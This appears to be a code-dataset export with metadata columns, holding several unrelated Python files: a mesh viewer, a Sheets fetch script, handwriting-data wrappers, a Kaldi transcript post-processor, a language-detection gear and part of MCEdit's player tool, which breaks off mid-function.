dirname = dlg.GetDirectory()
filepath = os.path.join(dirname, filename)
saveImageGL(self.glcanvas, filepath)
dlg.Destroy()
return
def OnExit(self, evt):
self.Close(True)
return
class MeshViewer(object):
def __init__(self, m1 = None, m2 = None):
app = wx.App()
frame = MeshViewerFrame(None, -1, 'MeshViewer', mesh1 = m1, mesh2 = m2)
frame.Show(True)
app.MainLoop()
app.Destroy()
if __name__ == '__main__':
m1 = None
m2 = None
if len(argv) >= 3:
m1 = argv[1]
m2 = argv[2]
viewer = MeshViewer(m1, m2)
| 34.010267 | 152 | 0.71871 | 2,321 | 16,563 | 5.065489 | 0.202068 | 0.044909 | 0.01548 | 0.014374 | 0.344646 | 0.303819 | 0.242409 | 0.216382 | 0.163562 | 0.143574 | 0 | 0.022834 | 0.153897 | 16,563 | 486 | 153 | 34.080247 | 0.816112 | 0.070036 | 0 | 0.24812 | 0 | 0 | 0.062004 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.002506 | 0.050125 | null | null | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9143b8c633adb2c76477406a889fd2a426c5cda8 | 278 | py | Python | gigamonkeys/get.py | gigamonkey/sheets | a89e76360ad9a35e44e5e352346eeccbe6952b1f | [
"BSD-3-Clause"
] | null | null | null | gigamonkeys/get.py | gigamonkey/sheets | a89e76360ad9a35e44e5e352346eeccbe6952b1f | [
"BSD-3-Clause"
] | 1 | 2021-04-03T23:07:35.000Z | 2021-04-03T23:07:35.000Z | gigamonkeys/get.py | gigamonkey/sheets | a89e76360ad9a35e44e5e352346eeccbe6952b1f | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
import json
import sys
from gigamonkeys.spreadsheets import spreadsheets
spreadsheet_id = sys.argv[1]
ranges = sys.argv[2:]
data = spreadsheets().get(spreadsheet_id, include_grid_data=bool(ranges), ranges=ranges)
json.dump(data, sys.stdout, indent=2)
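The argument handling above can be sketched in isolation: the first CLI argument is the spreadsheet id, everything after it is an A1-notation range, and grid data is only requested when at least one range was supplied. `parse_args` is an illustrative helper, not part of the script.

```python
def parse_args(argv):
    """Mirror the script's sys.argv handling: id first, ranges after."""
    spreadsheet_id = argv[1]
    ranges = argv[2:]
    return spreadsheet_id, ranges, bool(ranges)  # bool(ranges) -> include_grid_data

print(parse_args(["get.py", "abc123"]))                  # ('abc123', [], False)
print(parse_args(["get.py", "abc123", "Sheet1!A1:B2"]))  # ('abc123', ['Sheet1!A1:B2'], True)
```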
| 19.857143 | 88 | 0.773381 | 41 | 278 | 5.146341 | 0.585366 | 0.123223 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012048 | 0.104317 | 278 | 13 | 89 | 21.384615 | 0.835341 | 0.071942 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.428571 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
9146c7949d8b05d057e0f629fb324a047f0358c0 | 6,145 | py | Python | sources/wrappers.py | X-rayLaser/keras-auto-hwr | 67cfc0209045b1e211f0491b0199cb9d6811bfd0 | [
"MIT"
] | null | null | null | sources/wrappers.py | X-rayLaser/keras-auto-hwr | 67cfc0209045b1e211f0491b0199cb9d6811bfd0 | [
"MIT"
] | 2 | 2020-01-04T09:03:31.000Z | 2021-05-10T18:29:41.000Z | sources/wrappers.py | X-rayLaser/keras-auto-hwr | 67cfc0209045b1e211f0491b0199cb9d6811bfd0 | [
"MIT"
] | null | null | null | import numpy as np
from sources import BaseSource
from sources.base import BaseSourceWrapper
from sources.preloaded import PreLoadedSource
import json
class WordsSource(BaseSource):
def __init__(self, source):
self._source = source
def __len__(self):
return len(self._source)
def _remove_apostrophes(self, seq):
res = ''.join(seq.split("'"))
res = ''.join(res.split('"'))
return res
def _clean(self, seq):
s = ''
for ch in seq.strip():
if ch.isalpha():
s += ch
return s
def get_sequences(self):
for seq_in, transcription in self._source.get_sequences():
transcription = self._remove_apostrophes(transcription)
words = [self._clean(word) for word in transcription.split(' ')]
yield seq_in, words
class LabelSource(BaseSource):
def __init__(self, source, mapping_table):
self._source = source
self._mapping_table = mapping_table
def __len__(self):
return len(self._source)
def get_sequences(self):
for seq_in, seq_out in self._source.get_sequences():
label_seq = [self._mapping_table.encode(ch) for ch in seq_out]
yield seq_in, label_seq
class CTCAdaptedSource(BaseSource):
def __init__(self, source, padding_value=0):
self._source = source
self._padding = padding_value
def __len__(self):
return len(self._source)
def get_sequences(self):
for seq_in, seq_out in self._source.get_sequences():
seqs_in_pad = list(seq_in)
while len(seqs_in_pad) <= 2 * len(seq_out) + 1:
n = len(seqs_in_pad[0])
seqs_in_pad.append([self._padding] * n)
yield seqs_in_pad, seq_out
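The padding loop in CTCAdaptedSource can be sketched standalone: CTC alignment needs the input to be longer than 2 * len(labels) + 1 frames (a blank symbol can separate every label), so shorter inputs are extended with constant pad frames. `pad_for_ctc` is an illustrative helper, not part of the class above.

```python
def pad_for_ctc(seq_in, seq_out, padding_value=0):
    """Pad seq_in (a list of feature vectors) until it is longer than
    2 * len(seq_out) + 1, mirroring CTCAdaptedSource.get_sequences."""
    padded = list(seq_in)
    while len(padded) <= 2 * len(seq_out) + 1:
        n = len(padded[0])                 # frame width stays constant
        padded.append([padding_value] * n)
    return padded

frames = [[0.1, 0.2], [0.3, 0.4]]          # 2 frames of 2 features
labels = [5, 7]                            # needs more than 2 * 2 + 1 = 5 frames
print(len(pad_for_ctc(frames, labels)))    # 6
```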
class Normalizer:
def __init__(self):
self._mu = None
self._sd = None
@staticmethod
def from_json(path):
with open(path, 'r') as f:
s = f.read()
d = json.loads(s)
normalizer = Normalizer()
mu = np.array(d['mu'])
sd = np.array(d['sd'])
normalizer.set_mean(mu)
normalizer.set_deviation(sd)
return normalizer
def to_json(self, path):
d = {
'mu': np.array(self.mu).tolist(),
'sd': np.array(self.sd).tolist()
}
with open(path, 'w') as f:
f.write(json.dumps(d))
def set_mean(self, mu):
self._mu = mu
def set_deviation(self, sd):
self._sd = sd
@property
def mu(self):
return self._mu
@property
def sd(self):
return self._sd
def fit(self, X):
sequence = []
for x in X:
sequence.extend(x)
self._mu = np.mean(sequence, axis=0)
self._sd = np.std(sequence, axis=0)
def preprocess(self, X):
res = []
for x in X:
x_norm = (x - self._mu) / self._sd
# we do not want to normalize END-OF-STROKE flag which is last in the tuple
x_norm[:, -1] = np.array(x)[:, -1]
res.append(x_norm.tolist())
return res
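The Normalizer contract above can be shown on toy data: z-score every feature column except the last, which is the END-OF-STROKE flag and must pass through unchanged. The sequences below are illustrative, not taken from the dataset.

```python
import numpy as np

seqs = [[(0.0, 0.0, 0.0, 0), (2.0, 4.0, 1.0, 1)],
        [(4.0, 8.0, 2.0, 0), (6.0, 12.0, 3.0, 1)]]

flat = [p for seq in seqs for p in seq]   # fit() pools all points together
mu = np.mean(flat, axis=0)
sd = np.std(flat, axis=0)

x = np.array(seqs[0], dtype=float)
x_norm = (x - mu) / sd
x_norm[:, -1] = x[:, -1]                  # restore the binary flag column

print(x_norm[:, -1].tolist())             # [0.0, 1.0]
```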
class OffsetPointsSource(BaseSource):
def __init__(self, source):
self._source = source
def __len__(self):
return len(self._source)
def get_sequences(self):
for strokes, transcription in self._source.get_sequences():
x0, y0, t0 = strokes[0].points[0]
new_seq = []
for stroke in strokes:
points = []
for x, y, t in stroke.points:
points.append((x - x0, y - y0, t - t0, 0))
points[-1] = points[-1][:-1] + (1,)
new_seq.extend(points)
yield new_seq, transcription
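The offset encoding done by OffsetPointsSource can be sketched without the stroke objects: every point becomes (x - x0, y - y0, t - t0, flag) relative to the first point of the first stroke, and the flag is 1 only on the last point of each stroke. The raw strokes below are toy values.

```python
strokes = [[(10, 20, 100), (11, 21, 101)],   # one stroke of (x, y, t) points
           [(12, 22, 102)]]

x0, y0, t0 = strokes[0][0]
encoded = []
for stroke in strokes:
    points = [(x - x0, y - y0, t - t0, 0) for x, y, t in stroke]
    points[-1] = points[-1][:-1] + (1,)      # mark END-OF-STROKE
    encoded.extend(points)

print(encoded)
# [(0, 0, 0, 0), (1, 1, 1, 1), (2, 2, 2, 1)]
```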
class NormalizedSource(BaseSource):
def __init__(self, source, normalizer):
self._source = source
self._normalizer = normalizer
def __len__(self):
return len(self._source)
def get_sequences(self):
for points, transcription in self._source.get_sequences():
norm = self._normalizer.preprocess([points])[0]
yield norm, transcription
class DenormalizedSource(BaseSource):
def __init__(self, source, normalizer):
self._source = source
self._normalizer = normalizer
def __len__(self):
return len(self._source)
def get_sequences(self):
mu = self._normalizer.mu
sd = self._normalizer.sd
for points, transcription in self._source.get_sequences():
denormalized = [(p * sd + mu).tolist() for p in points]
for i, p in enumerate(denormalized):
p[3] = points[i][3]
yield denormalized, transcription
class H5pySource(BaseSource):
def __init__(self, h5py_ds, random_order=True):
self._h5py = h5py_ds
self._random = random_order
def __len__(self):
return len(self._h5py)
def get_sequences(self):
return self._h5py.get_data(random_order=self._random)
class PreprocessedSource(BaseSourceWrapper):
def __init__(self, source, preprocessor):
super().__init__(source)
self._preprocessor = preprocessor
def get_sequences(self):
for xs, ys in self._source.get_sequences():
yield self._preprocessor.pre_process_example(xs, ys)
class ConstrainedSource(BaseSourceWrapper):
def __init__(self, source, num_lines):
super().__init__(source)
self._num_lines = num_lines
self._use_all = (num_lines == 0)
def get_sequences(self):
for j, (seq_in, seq_out) in enumerate(self._source.get_sequences()):
#print(j, seq_out)
if j % 500 == 0:
print('Fetched {} examples'.format(j))
if j >= self._num_lines and not self._use_all:
break
yield seq_in, seq_out
class PlainListSource(BaseSourceWrapper):
def get_sequences(self):
for strokes, t in self._source.get_sequences():
points = [stroke.points for stroke in strokes]
yield points, t
| 26.038136 | 87 | 0.588771 | 757 | 6,145 | 4.498018 | 0.198151 | 0.085169 | 0.032305 | 0.0558 | 0.314244 | 0.247577 | 0.208517 | 0.200587 | 0.174449 | 0.174449 | 0 | 0.008201 | 0.305452 | 6,145 | 235 | 88 | 26.148936 | 0.789597 | 0.014646 | 0 | 0.284848 | 0 | 0 | 0.00694 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.224242 | false | 0 | 0.030303 | 0.060606 | 0.406061 | 0.006061 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
91487dc34ce39dcba03a9475df5437871d95ebe4 | 2,546 | py | Python | sample_full_post_processor.py | huynguyen82/Modified-Kaldi-GStream-OnlineServer | e7429a5e44b9567b603523c0046fb42d8503a275 | [
"BSD-2-Clause"
] | null | null | null | sample_full_post_processor.py | huynguyen82/Modified-Kaldi-GStream-OnlineServer | e7429a5e44b9567b603523c0046fb42d8503a275 | [
"BSD-2-Clause"
] | 1 | 2021-03-25T23:17:23.000Z | 2021-03-25T23:17:23.000Z | sample_full_post_processor.py | huynguyen82/Modified-Kaldi-GStream-OnlineServer | e7429a5e44b9567b603523c0046fb42d8503a275 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
import sys
import json
import logging
from math import exp
import requests as rq
import re
### For NLP post-processing
header={"Content-Type": "application/json"}
message='{"sample":"Hello bigdata"}'
api_url="http://192.168.1.197:11992/norm"
###
def NLP_process_output(pre_str):
try:
jmsg=json.loads(message)
jmsg['sample']=pre_str
r = rq.post(api_url,json=jmsg, headers=header)
results = json.loads(r.text)['result']
logging.info("NLP=%s" % results)
return results
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logging.error("Failed to get NLP post-processing: %s : %s " % (exc_type, exc_value))
return pre_str
def post_process_json(str):
try:
event = json.loads(str)
if "result" in event:
if len(event["result"]["hypotheses"]) > 1:
likelihood1 = event["result"]["hypotheses"][0]["likelihood"]
likelihood2 = event["result"]["hypotheses"][1]["likelihood"]
confidence = likelihood1 - likelihood2
confidence = 1 - exp(-confidence)
else:
confidence = 1.0e+10
event["result"]["hypotheses"][0]["confidence"] = confidence
org_trans = event["result"]["hypotheses"][0]["transcript"]
logging.info("Recognized result=%s" % org_trans )
out_trans = NLP_process_output(org_trans) + '.'
logging.info("Pass into function is %s" % out_trans)
event["result"]["hypotheses"][0]["transcript"] = out_trans
del event["result"]["hypotheses"][1:]
return json.dumps(event)
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logging.error("Failed to process JSON result: %s : %s " % (exc_type, exc_value))
return str
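The confidence heuristic in post_process_json can be isolated: the gap between the best and second-best hypothesis likelihoods is squashed into (0, 1) with `1 - exp(-gap)`, so a larger gap means a more certain recognition. `confidence` is an illustrative extraction of that formula.

```python
from math import exp

def confidence(likelihood1, likelihood2):
    """Squash the likelihood gap between the top two hypotheses into (0, 1)."""
    return 1 - exp(-(likelihood1 - likelihood2))

print(round(confidence(120.0, 118.0), 4))  # 0.8647 -- clear winner
print(round(confidence(120.0, 119.9), 4))  # 0.0952 -- near tie
```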
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG, format="%(levelname)8s %(asctime)s %(message)s ")
lines = []
while True:
l = sys.stdin.readline()
if not l: break # EOF
if l.strip() == "":
if len(lines) > 0:
result_json = post_process_json("".join(lines))
print result_json
print
sys.stdout.flush()
lines = []
else:
lines.append(l)
if len(lines) > 0:
result_json = post_process_json("".join(lines))
print result_json
lines = []
| 34.405405 | 94 | 0.565593 | 297 | 2,546 | 4.693603 | 0.363636 | 0.055237 | 0.105452 | 0.043042 | 0.262554 | 0.262554 | 0.209469 | 0.176471 | 0.176471 | 0.176471 | 0 | 0.019016 | 0.297722 | 2,546 | 73 | 95 | 34.876712 | 0.760626 | 0.018853 | 0 | 0.265625 | 0 | 0 | 0.178313 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.015625 | 0.09375 | null | null | 0.046875 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
914899652debcd6bf278b6bcd59488d3ca01a934 | 349 | py | Python | lang_detect_gears.py | AlexMikhalev/cord19redisknowledgegraph | a143415aca8d4a6db820dc7a25280045f421a665 | [
"Apache-2.0"
] | 7 | 2020-05-18T09:25:17.000Z | 2021-08-05T00:23:36.000Z | lang_detect_gears.py | maraqa1/CORD-19 | a473f7b60b8dfa476ea46505678481e4b361d04e | [
"Apache-2.0"
] | 10 | 2020-05-31T14:44:26.000Z | 2022-03-25T19:17:37.000Z | lang_detect_gears.py | maraqa1/CORD-19 | a473f7b60b8dfa476ea46505678481e4b361d04e | [
"Apache-2.0"
] | null | null | null | from langdetect import detect
def detect_language(x):
#detect language of the article
try:
lang=detect(x['value'])
except:
lang="empty"
execute('SET', 'lang_article:' + x['key'], lang)
if lang!='en':
execute('SADD','titles_to_delete', x['key'])
gb = GB()
gb.foreach(detect_language)
gb.run('title:*')
 | 23.266667 | 52 | 0.60745 | 47 | 349 | 4.404255 | 0.595745 | 0.202899 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.22063 | 349 | 15 | 53 | 23.266667 | 0.761029 | 0.08596 | 0 | 0 | 0 | 0 | 0.191223 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.083333 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
914c1ed0296d91a573e8d232f2ea7fec8dafd2e3 | 46,013 | py | Python | editortools/player.py | bennettdc/MCEdit-Unified | 90abfb170c65b877ac67193e717fa3a3ded635dd | [
"0BSD"
] | 237 | 2018-02-04T19:13:31.000Z | 2022-03-26T03:06:07.000Z | editortools/player.py | bennettdc/MCEdit-Unified | 90abfb170c65b877ac67193e717fa3a3ded635dd | [
"0BSD"
] | 551 | 2015-01-01T02:36:53.000Z | 2018-02-01T00:03:12.000Z | editortools/player.py | bennettdc/MCEdit-Unified | 90abfb170c65b877ac67193e717fa3a3ded635dd | [
"0BSD"
] | 97 | 2015-01-02T01:31:12.000Z | 2018-01-22T05:37:47.000Z | """Copyright (c) 2010-2012 David Rio Vierra
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE."""
#-# Modifiedby D.C.-G. for translation purpose
from OpenGL import GL
import numpy
import os
from albow import TableView, TableColumn, Label, Button, Column, CheckBox, AttrRef, Row, ask, alert, input_text_buttons, TabPanel
from albow.table_view import TableRowView
from albow.translate import _
from config import config
from editortools.editortool import EditorTool
from editortools.tooloptions import ToolOptions
from glbackground import Panel
from glutils import DisplayList
from mceutils import loadPNGTexture, alertException, drawTerrainCuttingWire, drawCube
from operation import Operation
import pymclevel
from pymclevel.box import BoundingBox, FloatBox
from pymclevel import nbt
import logging
from player_cache import PlayerCache, ThreadRS
from nbtexplorer import loadFile, saveFile, NBTExplorerToolPanel
import pygame
log = logging.getLogger(__name__)
class PlayerRemoveOperation(Operation):
undoTag = None
def __init__(self, tool, player="Player (Single Player)"):
super(PlayerRemoveOperation, self).__init__(tool.editor, tool.editor.level)
self.tool = tool
self.player = player
self.level = self.tool.editor.level
self.canUndo = False
self.playercache = PlayerCache()
def perform(self, recordUndo=True):
if self.level.saving:
alert(_("Cannot perform action while saving is taking place"))
return
if self.player == "Player (Single Player)":
answer = ask(_("Are you sure you want to delete the default player?"), ["Yes", "Cancel"])
if answer == "Cancel":
return
self.player = "Player"
if recordUndo:
self.undoTag = self.level.getPlayerTag(self.player)
self.level.players.remove(self.player)
if self.tool.panel:
if self.player != "Player":
#self.tool.panel.players.remove(player_cache.getPlayerNameFromUUID(self.player))
#self.tool.panel.players.remove(self.playercache.getPlayerInfo(self.player)[0])
str()
else:
self.tool.panel.players.remove("Player (Single Player)")
while self.tool.panel.table.index >= len(self.tool.panel.players):
self.tool.panel.table.index -= 1
#if len(self.tool.panel.players) == 0:
# self.tool.hidePanel()
# self.tool.showPanel()
self.tool.hidePanel()
self.tool.showPanel()
self.tool.markerList.invalidate()
self.tool.movingPlayer = None
pos = self.tool.revPlayerPos[self.editor.level.dimNo][self.player]
del self.tool.playerPos[self.editor.level.dimNo][pos]
if self.player != "Player":
del self.tool.playerTexture[self.player]
else:
del self.level.root_tag["Data"]["Player"]
del self.tool.revPlayerPos[self.editor.level.dimNo][self.player]
self.canUndo = True
def undo(self):
if not (self.undoTag is None):
if self.player != "Player":
self.level.playerTagCache[self.level.getPlayerPath(self.player)] = self.undoTag
else:
self.level.root_tag["Data"]["Player"] = self.undoTag
self.level.players.append(self.player)
if self.tool.panel:
#if self.player != "Player":
# self.tool.panel.players.append(self.playercache.getPlayerInfo(self.player)[0])
#else:
# self.tool.panel.players.append("Player (Single Player)")
if "[No players]" in self.tool.panel.players:
self.tool.panel.players.remove("[No players]")
self.tool.hidePanel()
self.tool.showPanel()
self.tool.markerList.invalidate()
def redo(self):
self.perform()
class PlayerAddOperation(Operation):
playerTag = None
def __init__(self, tool):
super(PlayerAddOperation, self).__init__(tool.editor, tool.editor.level)
self.tool = tool
self.level = self.tool.editor.level
self.canUndo = False
self.playercache = PlayerCache()
def perform(self, recordUndo=True):
initial = ""
allowed_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
while True:
self.player = input_text_buttons("Enter a Player Name: ", 160, initial=initial, allowed_chars=allowed_chars)
if self.player is None:
return
elif len(self.player) > 16:
alert("Name too long. Maximum name length is 16.")
initial = self.player
elif len(self.player) < 1:
alert("Name too short. Minimum name length is 1.")
initial = self.player
else:
break
# print 1
data = self.playercache.getPlayerInfo(self.player)
if "<Unknown UUID>" not in data and "Server not ready" not in data:
self.uuid = data[0]
self.player = data[1]
else:
action = ask("Could not get {}'s UUID. Please make sure that you are connected to the internet and that the player \"{}\" exists.".format(self.player, self.player), ["Enter UUID manually", "Cancel"])
if action != "Enter UUID manually":
return
self.uuid = input_text_buttons("Enter a Player UUID: ", 160)
if not self.uuid:
return
# print 2
self.player = self.playercache.getPlayerInfo(self.uuid)
if self.player == self.uuid.replace("-", ""):
if ask("UUID was not found. Continue anyways?") == "Cancel":
return
# print "PlayerAddOperation.perform::self.uuid", self.uuid
if self.uuid in self.level.players:
alert("Player already exists in this World.")
return
self.playerTag = self.newPlayer()
#if self.tool.panel:
# self.tool.panel.players.append(self.player)
if self.level.oldPlayerFolderFormat:
self.level.playerTagCache[self.level.getPlayerPath(self.player)] = self.playerTag
self.level.players.append(self.player)
#if self.tool.panel:
#self.tool.panel.player_UUID[self.player] = self.player
else:
self.level.playerTagCache[self.level.getPlayerPath(self.uuid)] = self.playerTag
self.level.players.append(self.uuid)
if self.tool.panel:
self.tool.panel.player_UUID["UUID"].append(self.uuid)
self.tool.panel.player_UUID["Name"].append(self.player)
self.tool.playerPos[self.editor.level.dimNo][(0,0,0)] = self.uuid
self.tool.revPlayerPos[self.editor.level.dimNo][self.uuid] = (0,0,0)
# print 3
r = self.playercache.getPlayerSkin(self.uuid, force_download=False)
if not isinstance(r, (str, unicode)):
# print 'r 1', r
r = r.join()
# print 'r 2', r
self.tool.playerTexture[self.uuid] = loadPNGTexture(r)
self.tool.markerList.invalidate()
self.tool.recordMove = False
self.tool.movingPlayer = self.uuid
if self.tool.panel:
self.tool.hidePanel()
self.tool.showPanel()
self.canUndo = True
self.playerTag.save(self.level.getPlayerPath(self.uuid))
self.tool.nonSavedPlayers.append(self.level.getPlayerPath(self.uuid))
self.tool.inOtherDimension[self.editor.level.dimNo].append(self.uuid)
def newPlayer(self):
playerTag = nbt.TAG_Compound()
playerTag['Air'] = nbt.TAG_Short(300)
playerTag['AttackTime'] = nbt.TAG_Short(0)
playerTag['DeathTime'] = nbt.TAG_Short(0)
playerTag['Fire'] = nbt.TAG_Short(-20)
playerTag['Health'] = nbt.TAG_Short(20)
playerTag['HurtTime'] = nbt.TAG_Short(0)
playerTag['Score'] = nbt.TAG_Int(0)
playerTag['FallDistance'] = nbt.TAG_Float(0)
playerTag['OnGround'] = nbt.TAG_Byte(0)
playerTag['Dimension'] = nbt.TAG_Int(self.editor.level.dimNo)
playerTag["Inventory"] = nbt.TAG_List()
playerTag['Motion'] = nbt.TAG_List([nbt.TAG_Double(0) for i in xrange(3)])
spawn = self.level.playerSpawnPosition()
spawnX = spawn[0]
spawnZ = spawn[2]
blocks = [self.level.blockAt(spawnX, i, spawnZ) for i in xrange(self.level.Height)]
i = self.level.Height
done = False
for index, b in enumerate(reversed(blocks)):
if b != 0 and not done:
i = index
done = True
spawnY = self.level.Height - i
playerTag['Pos'] = nbt.TAG_List([nbt.TAG_Double([spawnX, spawnY, spawnZ][i]) for i in xrange(3)])
playerTag['Rotation'] = nbt.TAG_List([nbt.TAG_Float(0), nbt.TAG_Float(0)])
return playerTag
def undo(self):
self.level.players.remove(self.uuid)
self.tool.movingPlayer = None
if self.tool.panel:
#self.tool.panel.players.remove(self.player)
self.tool.panel.player_UUID["UUID"].remove(self.uuid)
self.tool.panel.player_UUID["Name"].remove(self.player)
self.tool.hidePanel()
self.tool.showPanel()
if self.tool.movingPlayer is None:
del self.tool.playerPos[self.tool.revPlayerPos[self.uuid]]
else:
del self.tool.playerPos[(0,0,0)]
del self.tool.revPlayerPos[self.uuid]
del self.tool.playerTexture[self.uuid]
os.remove(self.level.getPlayerPath(self.uuid))
if self.level.getPlayerPath(self.uuid) in self.tool.nonSavedPlayers:
self.tool.nonSavedPlayers.remove(self.level.getPlayerPath(self.uuid))
self.tool.markerList.invalidate()
def redo(self):
if not (self.playerTag is None):
self.level.playerTagCache[self.level.getPlayerPath(self.uuid)] = self.playerTag
self.level.players.append(self.uuid)
if self.tool.panel:
#self.tool.panel.players.append(self.uuid)
#self.tool.panel.player_UUID[self.player] = self.uuid
self.tool.panel.player_UUID["UUID"].append(self.uuid)
self.tool.panel.player_UUID["Name"].append(self.player)
# print 4
r = self.playercache.getPlayerSkin(self.uuid)
if isinstance(r, (str, unicode)):
r = r.join()
self.tool.playerTexture[self.uuid] = loadPNGTexture(r)
self.tool.playerPos[(0,0,0)] = self.uuid
self.tool.revPlayerPos[self.uuid] = (0,0,0)
self.playerTag.save(self.level.getPlayerPath(self.uuid))
self.tool.nonSavedPlayers.append(self.level.getPlayerPath(self.uuid))
self.tool.markerList.invalidate()
class PlayerMoveOperation(Operation):
undoPos = None
redoPos = None
def __init__(self, tool, pos, player="Player", yp=(None, None)):
super(PlayerMoveOperation, self).__init__(tool.editor, tool.editor.level)
self.tool = tool
self.canUndo = False
self.pos = pos
self.player = player
self.yp = yp
def perform(self, recordUndo=True):
if self.level.saving:
alert(_("Cannot perform action while saving is taking place"))
return
try:
level = self.tool.editor.level
try:
self.undoPos = level.getPlayerPosition(self.player)
self.undoDim = level.getPlayerDimension(self.player)
self.undoYP = level.getPlayerOrientation(self.player)
except Exception as e:
log.info(_("Couldn't get player position! ({0!r})").format(e))
yaw, pitch = self.yp
if yaw is not None and pitch is not None:
level.setPlayerOrientation((yaw, pitch), self.player)
level.setPlayerPosition(self.pos, self.player)
level.setPlayerDimension(level.dimNo, self.player)
self.tool.playerPos[tuple(self.pos)] = self.player
self.tool.revPlayerPos[self.player] = self.pos
self.tool.markerList.invalidate()
self.canUndo = True
except pymclevel.PlayerNotFound as e:
print "Player move failed: ", e
def undo(self):
if not (self.undoPos is None):
level = self.tool.editor.level
try:
self.redoPos = level.getPlayerPosition(self.player)
self.redoDim = level.getPlayerDimension(self.player)
self.redoYP = level.getPlayerOrientation(self.player)
except Exception as e:
log.info(_("Couldn't get player position! ({0!r})").format(e))
level.setPlayerPosition(self.undoPos, self.player)
level.setPlayerDimension(self.undoDim, self.player)
level.setPlayerOrientation(self.undoYP, self.player)
self.tool.markerList.invalidate()
def redo(self):
if not (self.redoPos is None):
level = self.tool.editor.level
try:
self.undoPos = level.getPlayerPosition(self.player)
self.undoDim = level.getPlayerDimension(self.player)
self.undoYP = level.getPlayerOrientation(self.player)
except Exception as e:
log.info(_("Couldn't get player position! ({0!r})").format(e))
level.setPlayerPosition(self.redoPos, self.player)
level.setPlayerDimension(self.redoDim, self.player)
level.setPlayerOrientation(self.redoYP, self.player)
self.tool.markerList.invalidate()
@staticmethod
def bufferSize():
return 20
class SpawnPositionInvalid(Exception):
pass
def okayAt63(level, pos):
"""blocks 63 or 64 must be occupied"""
# return level.blockAt(pos[0], 63, pos[2]) != 0 or level.blockAt(pos[0], 64, pos[2]) != 0
return True
def okayAboveSpawn(level, pos):
"""3 blocks above spawn must be open"""
return not any([level.blockAt(pos[0], pos[1] + i, pos[2]) for i in xrange(1, 4)])
def positionValid(level, pos):
try:
return okayAt63(level, pos) and okayAboveSpawn(level, pos)
except EnvironmentError:
return False
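The rule in okayAboveSpawn — the three blocks directly above the spawn point must be air (block id 0) — can be checked against a stub level. `FakeLevel` and `okay_above_spawn` are illustrative stand-ins, not part of MCEdit.

```python
class FakeLevel(object):
    """Stub level: blockAt returns 1 (solid) for listed y values, else 0 (air)."""
    def __init__(self, solid_ys):
        self.solid_ys = set(solid_ys)
    def blockAt(self, x, y, z):
        return 1 if y in self.solid_ys else 0

def okay_above_spawn(level, pos):
    return not any(level.blockAt(pos[0], pos[1] + i, pos[2]) for i in range(1, 4))

print(okay_above_spawn(FakeLevel(solid_ys=[63]), (0, 63, 0)))      # True: 64-66 are air
print(okay_above_spawn(FakeLevel(solid_ys=[63, 65]), (0, 63, 0)))  # False: 65 is solid
```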
class PlayerSpawnMoveOperation(Operation):
undoPos = None
redoPos = None
def __init__(self, tool, pos):
super(PlayerSpawnMoveOperation, self).__init__(tool.editor, tool.editor.level)
self.tool, self.pos = tool, pos
self.canUndo = False
def perform(self, recordUndo=True):
if self.level.saving:
alert(_("Cannot perform action while saving is taking place"))
return
level = self.tool.editor.level
'''
if isinstance(level, pymclevel.MCInfdevOldLevel):
if not positionValid(level, self.pos):
if config.spawn.spawnProtection.get():
